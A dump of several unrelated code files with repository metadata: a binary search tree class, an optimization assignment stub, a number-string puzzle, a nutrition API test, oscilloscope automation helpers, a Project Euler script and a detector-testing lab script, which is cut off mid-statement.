return self.left.search(val)
else:
return False
if val > self.data:
if self.right:
return self.right.search(val)
else:
return False
def in_order_traversal(self):
elements = []
if self.left:
elements += self.left.in_order_traversal()
elements.append(self.data)
if self.right:
elements += self.right.in_order_traversal()
return elements
def find_min(self):
min = self.data
if self.left:
min = self.left.find_min()
return min
def find_max(self):
max = self.data
if self.right:
max = self.right.find_max()
return max
def calculate_sum(self):
        s = 0
if self.left:
s += self.left.calculate_sum()
s += self.data
if self.right:
s += self.right.calculate_sum()
return s
def pre_order_traversal(self):
element = [self.data]
if self.left:
element += self.left.pre_order_traversal()
if self.right:
element += self.right.pre_order_traversal()
return element
def post_order_traversal(self):
elements = []
if self.left:
elements += self.left.post_order_traversal()
if self.right:
elements += self.right.post_order_traversal()
elements.append(self.data)
return elements
def delete(self, val):
if val < self.data:
if self.left:
self.left = self.left.delete(val)
elif val > self.data:
if self.right:
self.right = self.right.delete(val)
else:
if self.left is None and self.right is None:
return None
elif self.left is None:
return self.right
elif self.right is None:
return self.left
max_val = self.left.find_max()
self.data = max_val
self.left = self.left.delete(max_val)
#min_val = self.right.find_min()
#self.data = min_val
#self.right = self.right.delete(min_val)
return self
def build_tree(elements):
root = BinarySearchTreeNode(elements[0])
for i in range(1,len(elements)):
root.add_child(elements[i])
return root
if __name__ == '__main__':
numbers_tree = build_tree([17,4,1,9,20,18,13,19,23,34])
print(numbers_tree.in_order_traversal())
print(numbers_tree.find_min())
print(numbers_tree.find_max())
print(numbers_tree.calculate_sum())
print(numbers_tree.pre_order_traversal())
print(numbers_tree.post_order_traversal())
print(numbers_tree.delete(20).post_order_traversal())
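    # For reference (illustrative): the in-order traversal printed first is
    # sorted, i.e. [1, 4, 9, 13, 17, 18, 19, 20, 23, 34].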
|
[
"noreply@github.com"
] |
noreply@github.com
|
c0b1d5e12729ae2d4281ed759d0bbf82b7099ad6
|
223286bbb702df3fdc4be40373990ae4431b6339
|
/Project1_2020/project1_py/project1.py
|
599a733141c81031a88a1d0096f538d21b3b30ca
|
[] |
no_license
|
Neethu-nr/aa222
|
a3959044668b56f84ced16c379ed27689af03cd0
|
5b9f999cf8ce5a78b53e7cb23d4594b48f2373c4
|
refs/heads/master
| 2022-09-26T17:38:12.960274
| 2020-06-08T19:42:07
| 2020-06-08T19:42:07
| 255,469,987
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
#
# File: project1.py
#
## top-level submission file
'''
Note: Do not import any other modules here.
To import from another file xyz.py here, type
import project1.xyz
However, do not import any modules except numpy in those files.
It's ok to import modules only in files that are
not imported here (e.g. for your plotting code).
'''
import numpy as np
from project1_py.DescentMethods import Adam, bfgs
def optimize(f, g, x0, n, count, prob):
"""
Args:
f (function): Function to be optimized
g (function): Gradient function for `f`
x0 (np.array): Initial position to start from
        n (int): Number of evaluations allowed. Remember `g` costs twice
            as much as `f`.
        count (function): takes no arguments and returns the current count
prob (str): Name of the problem. So you can use a different strategy
for each problem. `prob` can be `simple1`,`simple2`,`simple3`,
`secret1` or `secret2`
Returns:
x_best (np.array): best selection of variables found
"""
minimizer = Adam(f=f, g=g)
x, _, _, _ = minimizer.minimize(x0, n)
return x
|
[
"neethurenjith16@gmail.com"
] |
neethurenjith16@gmail.com
|
6a578669b0b8807127f6c38bf5a353544d819155
|
c30b95effe38f0e5afb058a10ed2b091df492e86
|
/algorithms/strings/separateNumbers.py
|
a92b93d3de029bc130aa4e6fc66fa831c3c131da
|
[] |
no_license
|
anikasetia/hackerrank
|
f7fbacf1ac5ef439842dffbe1592ebcd18271547
|
7f2605eb6a373516a8c11e01ffa08d9353395aa4
|
refs/heads/master
| 2021-01-25T09:53:39.934309
| 2018-08-09T15:30:27
| 2018-08-09T15:30:27
| 123,328,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
n = int(input())
strings = []
for i in range(n):
strings.append(input())
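# The loop below tests whether each string is a run of consecutive
# increasing integers with no leading zero, e.g. "91011" -> "YES 9"
# (9, 10, 11) while "101103" -> "NO".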
for each in strings:
if(each[0] == '0'):
print("NO")
else:
found = False
for i in range(1, len(each)):
initialStart = each[0:i]
start = each[0:i]
startInt = int(each[0:i])
while(len(start) < len(each)):
if(start == each[0:len(start)]):
start += str((startInt) + 1)
startInt += 1
else:
break
if(start == each):
print("YES " + initialStart)
found = True
break
if(not found):
print("NO")
|
[
"anika.setia18@gmail.com"
] |
anika.setia18@gmail.com
|
b3fc34e58ec618b0a2750999d13fbcd8c4e40d6c
|
2041a5a5c84d30884c3c0e14b9efb0c1351f363e
|
/core/unittests/test_nutritionAPI.py
|
f41910403adcbf0ae93251ddaab765c100fc2151
|
[
"MIT"
] |
permissive
|
Z3a1ot/PanPal
|
ca97b00d203bb88077b03fb6583a55c8778f4f88
|
3befdcc471c105804c5790a2deb20836e21b8d74
|
refs/heads/master
| 2021-07-18T09:01:04.371862
| 2017-10-21T18:19:02
| 2017-10-21T18:19:02
| 106,941,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
from unittest import TestCase
from core.recipe_sources.NutritionAPI import NutritionAPI
class TestNutritionAPI(TestCase):
def test_search_recipe(self):
napi = NutritionAPI()
result = napi.search_recipe("burger", 1)
self.assertEqual(len(result), 1)
self.assertIs(type(result[0].id), int)
self.assertIs(type(result[0].name), unicode)
print("{}".format(result))
def test_instructions(self):
napi = NutritionAPI()
recipe_id = 690978
result = napi.get_recipe_instructions(recipe_id)
self.assertGreater(len(result), 0)
        for v in result:
self.assertIs(type(v), unicode)
print("{}".format(result))
|
[
"oleg.tiurin@gmail.com"
] |
oleg.tiurin@gmail.com
|
6023bcb50aafd7b306145186bfcb06bd0caee57f
|
022cbcd9189f8db4a4f003e14ec2f68742acddf5
|
/scary_sphere.py
|
b06aba884ac33ace57bb95da57f7f95b24a3b63e
|
[] |
no_license
|
soggychips/Euler360
|
5d2688afb2788cb13fd88aaba9053c9959c353de
|
f6a6368cd5c443379fcf9dac5ef18f3dbe3fd38b
|
refs/heads/master
| 2021-01-13T02:23:15.439876
| 2014-07-09T04:34:40
| 2014-07-09T04:34:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,916
|
py
|
'''
Problem 360
http://projecteuler.net/problem=360
Given two points (x1,y1,z1) and (x2,y2,z2) in three dimensional space, the Manhattan distance between those points is defined as
|x1-x2|+|y1-y2|+|z1-z2|.
Let C(r) be a sphere with radius r and center in the origin O(0,0,0).
Let I(r) be the set of all points with integer coordinates on the surface of C(r).
Let S(r) be the sum of the Manhattan distances of all elements of I(r) to the origin O.
E.g. S(45)=34518.
Find S(10^10).
Eq. for a sphere:
for center C (q,w,e) and radius r, any point P (x,y,z) is on the sphere, if:
(x-q)^2 + (y-w)^2 + (z-e)^2 = r^2
=> r = sqrt(x**2+y**2+z**2)
in polar coords:
x = r(cos(theta)*sin(phi))
y = r(sin(theta)*sin(phi))
z = r(cos(phi))
'''
def isPointOnSphere(x,y,z,radius):
return (x**2+y**2+z**2 == radius**2)
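# e.g. (illustrative) isPointOnSphere(3, 4, 0, 5) is True, since 9 + 16 + 0 == 25.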
def Manhattan(x,y,z):
return abs(x) + abs(y) + abs(z)
def AddMan(radius):
points = sorted([Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)])
s = "S(%s) = " % radius
for p in range(0,len(points)):
s += "%s " % points[p]
if p != len(points)-1:
s += "+ "
#print "%s = %s" % (s,sum([Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)]))
print "Count(S(%s)) = %s" % (radius,len(points))
def AddMan_Gen(radius):
return sum(Manhattan(x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) for z in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius))
def PrintPointsAlongEquator(radius):
for z in range(0,radius+1):
l = list(((x,y,z) for x in range(-radius,radius+1) for y in range(-radius,radius+1) if isPointOnSphere(x,y,z,radius)))
if len(l)>0:
print "---\nz=%s" % z
print "len(l(%s)) = %s" % (z,len(l))
print l
|
[
"jake_cohen@me.com"
] |
jake_cohen@me.com
|
a6cf71ddbd080f0b5edf96e372e56ba25168cd51
|
0af4b9b6f923ff0978275101a7a88bd4775ad137
|
/functions.py
|
ca062d94b14a7853a2a91aba4b07a07f6117d853
|
[] |
no_license
|
sumukhvaidya/TDCF
|
acbd3e8854b79e854c32084c883156fbb888e402
|
6ce366a7fb7f9875526fd14b33d3f4ebce6ab3f6
|
refs/heads/master
| 2020-04-19T17:28:30.073066
| 2019-04-06T06:54:13
| 2019-04-06T06:54:13
| 168,336,101
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
# The screen resolution is 1366x768
import pyautogui
import visa
import time
import numpy as np
from struct import unpack
import csv
#pyautogui.PAUSE=1 #Just a pausing command
def setvoltage(vbase, vpulse, ch):
pyautogui.click(190,70) # Stop the current AFG run
#Double click on Waveform Sequencer for specified channel no
pyautogui.click(100,150+(ch-1)*65)
pyautogui.click(100,150+(ch-1)*65)
# time.delay(0.2)
pyautogui.click(300,230) #Double click waveform properties
pyautogui.click(300,230)
pyautogui.click(960,140) #Setting vpulse
pyautogui.typewrite(str(vpulse),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(960,175) # Setting vbase
pyautogui.typewrite(str(vbase),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(780,140) # Setting amplitude
pyautogui.typewrite(str((vpulse-vbase)/2),interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(930,640) # Clicking ok button
pyautogui.click(190,70) # Start the next AFG run
return
def settriggerdelay(t, ch): # t to be set in !NANOSECONDS!
pyautogui.click(190,70) # Stop the current AFG run
#Double click on Setting for specified channel no
pyautogui.click(100,130+(ch-1)*65)
pyautogui.click(100,130+(ch-1)*65)
# time.delay(0.2)
pyautogui.click(700,260) # Click Trigger Delay box
pyautogui.typewrite(str(t),interval=0.1)# Enter time in NANOSECONDS
pyautogui.typewrite('n',interval=0.1)
pyautogui.typewrite('\n',interval=0.1)
pyautogui.click(900,570) # Clicking ok button
pyautogui.click(190,70) # Start the next AFG run
return
def togglechannel(ch):
pyautogui.click(190,70) # Stop the current AFG run
pyautogui.click(250+(ch-1)*60,70)# Toggle the channel
pyautogui.click(190,70) # Start the next AFG run
return
def savedatacsv(scope, ch, filename):
s=""
scope.write(s.join(('DATA:SOU CH',str(ch)))) #Set Data source Channel
scope.write('DATA:WIDTH 1') # Set Data width
scope.write('DATA:ENC RPB') # Set data encoding
ymult = float(scope.query('WFMPRE:YMULT?')) # Pre-digitising level
yzero = float(scope.query('WFMPRE:YZERO?')) # Offset, if any
yoff = float(scope.query('WFMPRE:YOFF?')) # Related to trace position on screen
xincr = float(scope.query('WFMPRE:XINCR?'))# Time increment in sampling (x axis)
scope.write('CURVE?')
data = scope.read_raw()
headerlen = 2 + int(data[1])
header = data[:headerlen]
ADC_wave = data[headerlen:-1]
ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))
Volts = (ADC_wave - yoff) * ymult + yzero
Time = np.arange(0, xincr * len(Volts), xincr)
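    # Standard Tektronix waveform scaling: volts = (raw - YOFF) * YMULT + YZERO,
    # with the time axis reconstructed as sample index * XINCR.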
savefile=s.join((filename,'.csv'))
    with open(savefile, 'w') as csv_fh:
        writer = csv.writer(csv_fh, delimiter=',')
        #writer.writerow([]) #Repair this row to display the Vpre and Vcoll in the csv file too.
        writer.writerow(['Time', 'Volts'])  # Header row.
        # Write every sample; skipping none of the data points.
        for i in range(0, len(Time)):
            writer.writerow([str(Time[i]), str(Volts[i])])
return
|
[
"noreply@github.com"
] |
noreply@github.com
|
94b669b4d7fd6a41c17fb8fee0444d3ccd13ebcf
|
d3679511615b126a199fcaf923d9613526a3d41f
|
/chw3k5/checklist/unversioned-yuhan/uxm_bath_iv_noise_biasstep.py
|
2f7f56f6d12ab929aacf83dff9cef4a9953ea2ed
|
[] |
no_license
|
simonsobs/readout-script-dev
|
a00850eb294ca9dea7ba11af3a8af0f7f9404fd5
|
0b002f1477efb6b5fcaddc4a282c35883165a42a
|
refs/heads/master
| 2023-08-07T14:44:42.635388
| 2023-08-01T17:36:44
| 2023-08-01T17:36:44
| 164,685,976
| 1
| 2
| null | 2021-07-27T05:25:44
| 2019-01-08T16:08:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 19,011
|
py
|
'''
Code written in Oct 2021 by Yuhan Wang
to be used through OCS
UFM testing script in Pton
takes SC noise, normal noise, IV, (noise and biasstep) at 30,50,70 percent Rn
'''
import matplotlib
matplotlib.use('Agg')
import pysmurf.client
import argparse
import numpy as np
import os
import time
import glob
from sodetlib.det_config import DetConfig
from scipy.interpolate import interp1d
import csv
parser = argparse.ArgumentParser()
parser.add_argument('--slot',type=int)
parser.add_argument('--temp',type=str)
parser.add_argument('--output_file',type=str)
args = parser.parse_args()
slot_num = args.slot
bath_temp = args.temp
out_fn = args.output_file
cfg = DetConfig()
cfg.load_config_files(slot=slot_num)
S = cfg.get_smurf_control()
if slot_num == 2:
fav_tune_files = '/data/smurf_data/tune/1634501972_tune.npy'
if slot_num == 3:
fav_tune_files = '/data/smurf_data/tune/1634492357_tune.npy'
if slot_num == 4:
fav_tune_files = '/data/smurf_data/tune/1634507354_tune.npy'
if slot_num == 5:
fav_tune_files = '/data/smurf_data/tune/1633652773_tune.npy'
S.all_off()
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_mode_dc()
S.load_tune(fav_tune_files)
bands = [0,1,2,3,4,5,6,7]
for band in bands:
print('setting up band {}'.format(band))
S.set_att_dc(band,cfg.dev.bands[band]['dc_att'])
print('band {} dc_att {}'.format(band,S.get_att_dc(band)))
S.set_att_uc(band,cfg.dev.bands[band]['uc_att'])
print('band {} uc_att {}'.format(band,S.get_att_uc(band)))
S.amplitude_scale[band] = cfg.dev.bands[band]['drive']
print('band {} tone power {}'.format(band,S.amplitude_scale[band] ))
print('setting synthesis scale')
# hard coding it for the current fw
S.set_synthesis_scale(band,1)
print('running relock')
S.relock(band,tone_power=cfg.dev.bands[band]['drive'])
S.run_serial_gradient_descent(band);
S.run_serial_eta_scan(band);
print('running tracking setup')
S.set_feedback_enable(band,1)
S.tracking_setup(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], make_plot=False, save_plot=False, show_plot=False, channel=S.which_on(band), nsamp=2**18, lms_freq_hz=None, meas_lms_freq=True,feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
print('checking tracking')
S.check_lock(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], lms_freq_hz=None, feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_filter_disable(0)
S.set_rtm_arb_waveform_enable(0)
S.set_downsample_factor(20)
for bias_index, bias_g in enumerate(bias_groups):
S.set_tes_bias_low_current(bias_g)
bias_v = 0
## SC noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_tes_bias_bipolar_array([bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,0,0,0])
time.sleep(120)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
fieldnames = ['bath_temp','bias_voltage', 'bias_line', 'band', 'data_path','type','note']
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = bias_v
row['type'] = 'sc noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
## Normal noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 15, cool_wait= 3, high_current_mode=False, overbias_voltage= 5)
## sleep 6 mins to get stabilized
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = 20
row['type'] = 'normal noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##IV
bl_iv_list = []
for bias_gp in [0,1,2,3,4,5,6,7,8,9,10,11]:
row = {}
row['bath_temp'] = bath_temp
row['bias_line'] = bias_gp
row['band'] = 'all'
row['bias_voltage'] = 'IV 20 to 0'
row['type'] = 'IV'
print(f'Taking IV on bias line {bias_gp}, all band')
iv_data = S.run_iv(bias_groups = [bias_gp], wait_time=0.001, bias_high=20, bias_low=0, bias_step = 0.025, overbias_voltage=18, cool_wait=0, high_current_mode=False, make_plot=False, save_plot=True, cool_voltage = 18)
dat_file = iv_data[0:-13]+'.npy'
row['data_path'] = dat_file
bl_iv_list.append(dat_file)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#no wave form please
S.set_rtm_arb_waveform_enable(0)
##get target v bias from IV
good_chans = 0
all_data = dict()
for ind, bl in enumerate(bias_groups):
if bl not in all_data.keys():
all_data[bl] = dict()
now = np.load(bl_iv_list[bl], allow_pickle=True).item()
# print(now[3].keys())
# print(now[0].keys())
# print(now[0][0]['R'])
for sb in [0,1,2,3,4,5,6,7]:
try:
if len(now[sb].keys()) != 0:
all_data[bl][sb] = dict()
except:
continue
# print(now[sb].keys())
for chan, d in now[sb].items():
# print(d.keys())
if (d['R'][-1] < 5e-3):
continue
elif len(np.where(d['R'] > 10e-3)[0]) > 0:
continue
# elif len(np.where(d['R'] < -2e-4)[0]) > 10:
# continue
now_chan = len(all_data[bl][sb].keys())
all_data[bl][sb][now_chan] = d
good_chans += 1
##70% Rn first
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.7
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
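                # cross_idx: index of the upward crossing where R/R_n first
                # reaches percent_rn (previous sample below the threshold,
                # current sample at or above it).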
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
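# Note (illustrative reading of the script): the IV targets above were taken
# in low-current mode, so divide by high_low_current_ratio to command the
# equivalent bias while the lines are in high-current mode.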
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and disable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
# Take bias steps at three step sizes; each size is specified in
# low-current-mode volts and scaled into high-current-mode units.
for step_size in [0.1 / S.high_low_current_ratio,
                  0.025 / S.high_low_current_ratio,
                  0.01 / S.high_low_current_ratio]:
    dat_path = S.stream_data_on()
    for k in [0,1]:
        S.set_tes_bias_bipolar_array(bias_array)
        time.sleep(2)
        S.set_tes_bias_bipolar_array(bias_array - step_size)
        time.sleep(2)
    S.stream_data_off()
    row = {}
    row['bath_temp'] = bath_temp
    row['data_path'] = dat_path
    row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
    row['type'] = 'bias step'
    row['bias_line'] = 'all'
    row['band'] = 'all'
    row['note'] = '70 Rn step size {}'.format(step_size)
    with open(out_fn, 'a', newline = '') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 min
for i in range(6):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '70 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##50% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.5
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
        except Exception:  # no %Rn crossing found on this bias line/band
            continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and disable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 6 min (36 x 10 s)
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '50 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##30% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.3
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
        except Exception:  # no %Rn crossing found on this bias line/band
            continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(30):
time.sleep(10)
#switch to high current mode and disable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(1)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(1)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 5 min (30 x 10 s)
for i in range(30):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '30 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
